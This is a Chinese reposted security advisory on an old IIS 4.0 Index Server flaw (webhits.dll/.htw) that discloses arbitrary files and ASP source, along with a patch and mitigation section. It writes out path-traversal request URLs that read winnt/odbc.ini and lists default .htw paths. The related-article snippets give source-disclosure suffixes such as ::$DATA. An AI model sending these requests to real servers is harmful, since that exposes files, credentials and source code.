ASP漏洞集-虚拟web目录容易泄露ASP源代码 (MS,缺陷)

2016-01-29 19:55 98 1 收藏

ASP漏洞集-虚拟web目录容易泄露ASP源代码 (MS,缺陷),ASP漏洞集-虚拟web目录容易泄露ASP源代码 (MS,缺陷)

【 tulaoshi.com - ASP 】

涉及程序:
Microsoft Internet Information Server/Index Server
描述:
震撼安全发现:新的漏洞允许查看web服务器上任何文件包括ASP源码
详细:
IIS4.0上有一个应用程序映射htw---webhits.dll,这是用于Index Server的点击功能的。尽管你不运行Index Server,该映
射仍然有效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文件,数据库文件,和ASP源代码!
有两种方法来实现,第一,如果你的web server上存在.htw后缀的文件,则可以过下面的方式来查看文件内容,比如查看
odbc.ini文件的内容:
http://www.xxx.com/iissamples/issamples/oop/qfullhit.htw?
CiWebHitsFile=/../../winnt/odbc.ini&CiRestriction=none&CiHiliteType=Full
对于IIS的一般安装模式可以在下列位置找到.htw文件:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw
第二、如果你的web server上不存在这个文件,有漏洞的系统仍然允许用户调用webhits.dll,具体方式如下:
http://www.xxx.com/default.htm .htw?
CiWebHitsFile=/../../winnt/odbc.ini&CiRestriction=none&CiHiliteType=Full
条件是default.htm必须存在。这个文件名可以是其它文件,但必须存在。webhits.dll将会把这个文件作为临时文件打开。当上
述URL中的空格符 达到一定数目时,web服务的识别功能可能会出现问题,这样webhits.dll将打开指定的文件
winntodbc.ini。如果成功,用同样的方法可以打开更多的文件,包括ASP代码。近似的原理请见下面这段代码:
FILE *fd;
int DoesTemplateExist(char *pathtohtwfile)
{
// Just in case inetinfo.exe passes too long a string
// let's make sure it's of a suitable length and not
// going to open a buffer overrun vulnerability
char *file;
file = (char *)malloc(250);
strncpy(file,pathtohtwfile,250);
fd = fopen(file,"r");
// Success
if(fd !=NULL)
{
return 1;
}
// failed
else
{
return 0;
}
}
解决方案:
不使用index server功能的用户,可以在IIS管理控制台中,点 web站点,属性,选择主目录,配置(起始点),应用程序映射,
将htw与webhits.dll的映射删除。
如果要用到webhits.dll,则使用下面的补丁:
Index Server 2.0(Intel机器)的补丁
Index Server 2.0(Alpha机器)的补丁
Windows2000的Index Server服务补丁
安全建议:
建议在IIS控制台中删除无用的应用程序映射
相关站点:
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
from: http://www.cnns.net/article/db/49.htm

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/asp/)

来源:http://www.tulaoshi.com/n/20160129/1510372.html

延伸阅读
标签: ASP
1 在ASP程序后加个特殊符号,能看到ASP源程序 受影响的版本: win95+pws IIS3.0 98+pws4 不存在这个漏洞。 IIS4.0以上的版本也不存在这个漏洞。 问题描述: 这些特殊符号包括小数点,%81, ::$DATA。比如: http://someurl/somepage.asp. http:// someurl/somepage.asp%81 http:// someurl/somepage.asp::$DATA htt...
标签: Web开发
涉及程序: ServletExec 描述: 在HTTP请求中添加特殊字符导致暴露JSP源代码文件 详细: Unify eWave ServletExec 是一个 Java/Java Servlet 引擎插件,主要用于 WEB 服务器,例如:Microsoft IIS, Apache, Netscape Enterprise 服务器等等。 当一个 HTTP 请求中添加下列字符之一,ServletExec 将...
标签: ASP
  涉及程序: MS IIS    描述 国内一大学生发现的NT网站的ASP程序密码验证漏洞    详细 来自: benjurry@263.net 原文如下: 很早就发现很多国内程序员对密码验证不注意,今天去了陈水扁(www.abian.net)的网沾,随手一试,居然发现有这种漏洞,真是让人笑破肚皮! 原理: 很多网站把密码放到数据库中,在登陆验...
标签: Web开发
必须注意得是,该文件必须保存为.asp为后缀。另外IIS或者其它服务器端必须设置可执行教本程序。 %@ Language=VBScript % % Responst.ContentType="text/vnd.wap.wml" %?xml version="1.0"? !DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml" wml ca...
标签: ASP
       ASP教程:堵住ASP漏洞      作者:书生            --------------------------------------------------------------------------------    无论你相不相信,通过 asp,可能可以很方便地入侵 web server、窃取服务器上...

经验教程

763

收藏

39
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部